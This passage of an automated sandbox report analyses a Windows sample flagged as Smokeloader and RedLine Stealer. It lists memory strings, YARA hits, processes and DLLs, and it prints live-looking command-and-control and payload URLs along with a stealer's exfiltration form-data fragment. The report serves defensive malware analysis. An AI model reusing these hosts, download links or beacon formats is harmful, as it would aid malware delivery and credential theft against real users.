name="hwid"985EFFAB68083674480464------KJEHJKJEBGHJJKEBGIECContent-Disposition: form-data; name="build"default9_cap------KJEHJKJEBGHJJKEBGIEC--
                    Source: jicQJ2cdlM.exe, jicQJ2cdlM.exe, 00000000.00000003.4048046249.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174714149.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000003.4048093961.000000000086F000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.000000000086F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
                    Source: jicQJ2cdlM.exe, 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe48rt8k8rt4rwe5rbSOFTWARE
                    Source: jicQJ2cdlM.exe, 00000000.00000003.4048046249.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174714149.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeP
                    Source: jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exea
                    Source: jicQJ2cdlM.exe, 00000000.00000003.1784148548.000000000089D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exek4
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, A8A9.tmp.exe, 00000001.00000002.2054458680.0000000002DFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/$c
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/K
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php6
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpGc:
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpIc
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpJ
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpL
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpb
                    Source: A8A9.tmp.exe, 00000001.00000002.2054458680.0000000002DFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177S
                    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                    Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                    Source: jicQJ2cdlM.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                    Source: jicQJ2cdlM.exe, 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                    Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                    Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DET
                    Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000878000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/v
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009E1947 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_009E1947
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000001.00000002.2054499794.0000000002E09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009E237D NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_009E237D
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009E2621 NtdllDefWindowProc_W,PostQuitMessage,0_2_009E2621
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004280420_2_00428042
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004071D00_2_004071D0
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004373F90_2_004373F9
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004274A40_2_004274A4
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0042D50E0_2_0042D50E
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004285800_2_00428580
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004166CF0_2_004166CF
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004137450_2_00413745
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004278160_2_00427816
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0040E9990_2_0040E999
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00427AC00_2_00427AC0
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00418ACF0_2_00418ACF
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0042EB000_2_0042EB00
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00436CDF0_2_00436CDF
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00427D870_2_00427D87
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00413F2B0_2_00413F2B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_007F91A40_2_007F91A4
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009F41920_2_009F4192
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A0ED670_2_00A0ED67
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A082A90_2_00A082A9
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A087E70_2_00A087E7
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A0770B0_2_00A0770B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A0D7750_2_00A0D775
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009F39AC0_2_009F39AC
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009F69360_2_009F6936
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A07A7D0_2_00A07A7D
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009EEC000_2_009EEC00
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A07D270_2_00A07D27
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009F8D360_2_009F8D36
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A0ED670_2_00A0ED67
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A07FEE0_2_00A07FEE
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A16F460_2_00A16F46
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: String function: 009F09A7 appears 52 times
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: String function: 00410740 appears 52 times
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: String function: 0040F928 appears 36 times
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: String function: 0040FDD7 appears 123 times
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: String function: 009F003E appears 119 times
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 1132
                    Source: jicQJ2cdlM.exeBinary or memory string: OriginalFileName vs jicQJ2cdlM.exe
                    Source: jicQJ2cdlM.exe, 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs jicQJ2cdlM.exe
                    Source: jicQJ2cdlM.exe, 00000000.00000003.1746264050.0000000000A50000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs jicQJ2cdlM.exe
                    Source: jicQJ2cdlM.exe, 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs jicQJ2cdlM.exe
                    Source: jicQJ2cdlM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000001.00000002.2054499794.0000000002E09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: jicQJ2cdlM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: A8A9.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@1/3
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_007FA24E CreateToolhelp32Snapshot,Module32First,0_2_007FA24E
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_00413720
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htmJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeMutant created: \Sessions\1\BaseNamedObjects\48rt8k8rt4rwe5rb
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7404
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeFile created: C:\Users\user\AppData\Local\Temp\A8A9.tmpJump to behavior
                    Source: jicQJ2cdlM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: jicQJ2cdlM.exeReversingLabs: Detection: 31%
                    Source: unknownProcess created: C:\Users\user\Desktop\jicQJ2cdlM.exe "C:\Users\user\Desktop\jicQJ2cdlM.exe"
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeProcess created: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe "C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe"
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 1132
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeProcess created: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe "C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeUnpacked PE file: 1.2.A8A9.tmp.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.weririt:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeUnpacked PE file: 0.2.jicQJ2cdlM.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeUnpacked PE file: 1.2.A8A9.tmp.exe.400000.1.unpack
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC7E
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .weririt
                    Source: A8A9.tmp.exe.0.drStatic PE information: section name: .weririt
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00410786 push ecx; ret 0_2_00410799
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0043DB97 push dword ptr [esp+ecx-75h]; iretd 0_2_0043DB9B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0040FDB1 push ecx; ret 0_2_0040FDC4
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_007FB09B push es; iretd 0_2_007FB0AC
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_007FF46F pushad ; ret 0_2_007FF48B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_007FB576 push E8665AC8h; iretd 0_2_007FB57B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_007FF5ED push ecx; ret 0_2_007FF60A
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_007FDB31 push FFFFFFADh; ret 0_2_007FDBA3
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_007FCE64 push 00000003h; ret 0_2_007FCE68
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009F0018 push ecx; ret 0_2_009F002B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A179BF push esp; retf 0_2_00A179C7
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009F09ED push ecx; ret 0_2_009F0A00
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A19E08 pushad ; retf 0_2_00A19E0F
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A17FBD push esp; retf 0_2_00A17FBE
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0041B035 push ecx; ret 1_2_0041B048
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040020D pushfd ; iretd 1_2_00400211
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D2B29C push ecx; ret 1_2_02D2B2AF
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D10F59 pushfd ; iretd 1_2_02D11078
